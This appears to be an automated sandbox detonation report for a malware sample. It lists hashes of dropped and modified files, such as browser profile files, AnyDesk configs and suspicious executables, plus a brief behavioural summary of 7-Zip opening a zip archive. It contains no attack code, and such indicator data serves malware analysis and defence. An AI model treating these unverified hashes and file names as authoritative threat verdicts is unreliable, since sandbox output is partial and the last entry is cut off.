MD5 5059d0251f3292c45a54e0ab40cca733
SHA1 f888a0d0035a89ef534eb0403260f022fe990da6
SHA256 88d22b3a6a8bcb3ab03cfac5eef7fdf1cf4c99e17576d05997d2f0dfc96b8189
SHA512 546b8223ac7e25f9dd121d31d0600e3d6ca16ca0e9b54157958a798ac0853d62861af94e4fb4350b5bae7fb93f736deb723498aa31abde4e399b47af32cf79c5

C:\ProgramData\AnyDesk\system.conf

MD5 d36df503ffc3e74d30415a48a6247cf6
SHA1 a8faf383c1abc8eb3db5ed1fa9995f487fdfd032
SHA256 a5dc94d89e742a4fb17a622bdcca0808bb35f49d0272bbec8380907c4f113630
SHA512 eda699576984ba40c78793b791b16719c2fc3cc77f6f2db42c0849162fcdd82404f81de3cc896edbfa87534298ea8224ecef95e18cfaecd3157ef1599531f0f7

C:\ProgramData\AnyDesk\system.conf

MD5 01b78994d142c000bf79f64419b24869
SHA1 0102861d45c7ed17af079ab48f1d7283c5434376
SHA256 aaaadd3ffe1a0ca4d5559f1cadacc222cfa7cbc0de9fca4d1af2c2c1e52968c9
SHA512 b838ed8b4d5b610c9630e2bfa46a2c405bccaa96499964477a667d8cc13e3effbe76084dc066b262823763f9fbbcba9900f2fc011e92e4ee34657f86287632cf

C:\ProgramData\AnyDesk\service.conf

MD5 43f291469ce39c4964cea119d0417a1f
SHA1 c44f18004c04c7b8e463496f2469bd200f6809d4
SHA256 8f69574e324ab33fecd6c57e71928f7b0e7ebc33aa980328b7879c11240f6ae3
SHA512 0c18cb2f9361218ffa721aa8ba81a0d4440587079a41fb513f22c5f0927be01cb60d27bb52df4175c42ca72adb22c73766357a0353bfff708dad1b329c26f5d0

C:\Users\Admin\Desktop\Files\pp.exe

MD5 08dafe3bb2654c06ead4bb33fb793df8
SHA1 d1d93023f1085eed136c6d225d998abf2d5a5bf0
SHA256 fc16c0bf09002c93723b8ab13595db5845a50a1b6a133237ac2d148b0bb41700
SHA512 9cf2bd749a9ee6e093979bc0d3aacfba03ad6469c98ff3ef35ce5d1635a052e4068ac50431626f6ba8649361802f7fb2ffffb2b325e2795c54b7014180559c99

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\6e2394a8-41fc-48cc-8108-22f8aec77203.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 0f0403981795b4c6057b97ddf3ddc273
SHA1 add6e44abb42c5ab488188a05b7f2dc6d2989020
SHA256 c0603ee6eed65e1508b02faf7921c4c2bcd16316f9effc07248f42d93c4d6c33
SHA512 5385fe3c8c583756970bc810ad0517b3effba7fd4035f58b2d49a2f63c79e784c13c91e2785eb35105ff9ff4e205ef894500d55bf0e52eed67f48045eb56a0ee

C:\Users\Admin\Desktop\Files\twztl.exe

MD5 0c883b1d66afce606d9830f48d69d74b
SHA1 fe431fe73a4749722496f19b3b3ca0b629b50131
SHA256 d921fc993574c8be76553bcf4296d2851e48ee39b958205e69bdfd7cf661d2b1
SHA512 c047452a23efad4262479fbfeb5e23f9497d7cefd4cbb58e869801206669c2a0759698c70d18050316798d5d939b989537fdce3842aa742449f5e08ed7fa60a5

C:\Users\Admin\AppData\Local\Temp\Tmp75E5.tmp

MD5 6f314de373a4bd7428507f95edb4fd05
SHA1 f22d4eb0f831294fab5935f8319ab8f5fecd7ff5
SHA256 7e462035b33eba51a6b12e7dca10d04a5631818d8730954a60eb1f9dbdf503c9
SHA512 6b817c7ac0918e843fbf45e2b6021adaa2aa4c7da70c0549bbd6ca19c0e3e88817dbb5b6cb8bc6d90a87ab0a892fdbb694858cf2d5ec383295c8effb7e877544

C:\Users\Admin\AppData\Local\Temp\Tmp76E1.tmp

MD5 9034c65fef119b72b569abc3557742db
SHA1 7328d3184089100176f5f8714ce083bfbf69a429
SHA256 905a2f82f745870ca5e0c71fc61831ef7c7870e0aea26d0759523eda8ab01b8f
SHA512 da847b61ef1af2106ce8135f481ca33bdb38a8fa22614ac89dc7779514e3474b480e8d5140ba9b3e1176bde040bc66acfe69dc3e34f47ffe9c2fb55fbe8edfa7

C:\Users\Admin\AppData\Local\Temp\Tmp7741.tmp

MD5 a0c2f62f08c15173710f475749136cf7
SHA1 4c819135933d82aebab84393b6d9e1701c14e4c9
SHA256 a65ddf645516f3f13436fa4f3400a77014e952603efe21211043716b4882d91d
SHA512 fdbb1afd3635935384c51677c2b5440a1a1c43bc33137aec8dd1d927b7bf2bf4fafb5fb8cc1d0a37077c635ecd7abe392046c4df64c89055b79612126f8b55a6

C:\Users\Admin\AppData\Local\Temp\Tmp79D3.tmp

MD5 4302ae6e7ea3f4077de6f0b67e59e5c9
SHA1 3994cda4bce946957059be4374057b8163cb3b79
SHA256 879999b49a401f9eccdb06802c6be01583feab382246a6e98e8ad148bc5dbdc5
SHA512 85aed1bd9679c3a0b7459bd5e001a93f475f4ebec04305391072546d867aa904b6f22899acddde00187a11233797f635720dc1d048e28d8242eed36e94d53705

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 19b9b848fb451c265f1b4ead687c8dcf
SHA1 b42a59b13ec135631644730ffc52b1d9633ddc89
SHA256 db9a01259dd2db9e72f19c388fb5f56ff4a63b54f4cd1bb2f56e321fba6093d2
SHA512 d797836f741a3e89b4b5a74057415215038a0f4a9c2c3dd19c36ac34b2ca5431023d914f0b9a513d14ac9b735dac3c7947eaeb837e15c3cce82b0aa018c087d9

C:\Users\Admin\Desktop\Files\pornhub_downloader.exe

MD5 759f5a6e3daa4972d43bd4a5edbdeb11
SHA1 36f2ac66b894e4a695f983f3214aace56ffbe2ba
SHA256 2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d
SHA512 f97c793e1489e09dc6867bc9fb8a8e6073e08e1019b7a6fd57efdb31099047fcef9bc7bc3a8194742d7998f075c50e5d71670711bf077da1ac801aab7d19b385

C:\Users\Admin\Desktop\New Text Document mod.exse\a\Complexo%20v4.exe

MD5 d9694a6a1989d79aeded3f93cb97d24e
SHA1 a18019b9793029dac4d10e619ec85ea26909336a
SHA256 772c7a131d2a7a239ec39f32214eb94113aacd3984f572fb7e3b1fa1bec98f8c
SHA512 35a29c81d72f0e0bdb169c400dc90bf85859313c250824bf1fbbe362903c63f6a826e94994f8d86e8f56def5ce34cc71a45c6ff936e85fcfe8d169dbdb118168

C:\Users\Admin\Desktop\New Text Document mod.exse\a\srtware.exe

MD5 e364a1bd0e0be70100779ff5389a78da
SHA1 dd8269db6032720dbac028931e28a6588fca7bae
SHA256 7c8798ab738b8648a5faa9d157c0711be645fabf49c355a77477fb8da5df360e
SHA512 ff2ebfe652cdace05243df45100d5f8e306f65a128ec0b5395d1cc7be429e1b4090f744860963ef9996f74bccee134f198e9a6b0ff14383a404c6e4c9e6ef338

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 715332d9936c2ba2f4c97532d039ecb6
SHA1 6e244bf1d49b7db84c3b845482993a59ba0ce401
SHA256 2256c3f82f7ba53b83c29fdc1a49e459701fc68ae9f97069240da2f9552cf160
SHA512 ce7ec09ff67d42d96a115eb53fd304dc2ed1aebafdcc56ab4e6e1d56da561e37184c1658742960cffa496458cdd169e840e08bb27dc69499b89841a66afca0ce

C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe

MD5 c7174152bc891a4d374467523371ff11
SHA1 6ae1bdfcc4f8752842bdfa49a57709512c5a14c5
SHA256 fc4021427512de18c4f01d85a3fe16f424234a62bdbfcac7a7b818797365113d
SHA512 79823229323c202f92ffcc593be110ef1e2fcc13f812fae978957cc5ace71abc86e10d9e0a3b8ee4f83292b6f7c3186239fdd0110923ad01932c4adec3b67fe6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 7f4ae8519df5e3cf2cd2d92760334c4c
SHA1 1c609b265acb470b25135f667224a74799bc41f2
SHA256 3027f8a08bbf411aa5357c2c9a3c8a3db08fbafc958e7840d7226c70476e9ca5
SHA512 cf3bd689a78710cd121030c10b172d0bf645c7bba0bfeb832d065958088104691617d3817a28631ac83be267c0eed5c950ae5e23a1e45b2f141c0b67cb173bbf

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 80d0a8d6c2fa688d58e028246e979fb9
SHA1 8ba6a7ea4a76b92319cc69dd99509e28caaf3ba7
SHA256 ff3e5f18f4fa21f385537fcf9666aaf81c10e3a3ab923ae3d42776bcfb51a085
SHA512 a5f440ded11fbea4ea99ca54fb4209f62ddd75bf3c984e94073d52919b1ac75f84a2ee31fcd42730f5f54da791239f0fd48f224502d2728e249049c9e858687e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 220dbcd35bb0acd20da8cca52c90bbe0
SHA1 5e80f19f84c543f1535717eace826cbebdb0582b
SHA256 93fc06584b6c84a9e227edcd342dd579bdb995915643b7b6d4a55c60a3f8e600
SHA512 c0962ee625bc26e975cb6f48f502ec4fabb2e7c85d618cc745011e67f05505d07e378638f721c9749fc85e022137cecdad5909de38a8dea23cdf9e749052f0de

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

MD5 d99e79e4dbe0c315f514df2ae1b44e15
SHA1 e0d824ae4e8904483f9ceb802a78117f96730f7e
SHA256 2322e55849ae3345d6d0cc916f0449bc958de7df50b788b36cf05384ac21c68b

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-12 18:20

Reported

2024-12-12 18:25

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

277s

Command Line

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.zip"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Processes

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.zip"

Network


Files

N/A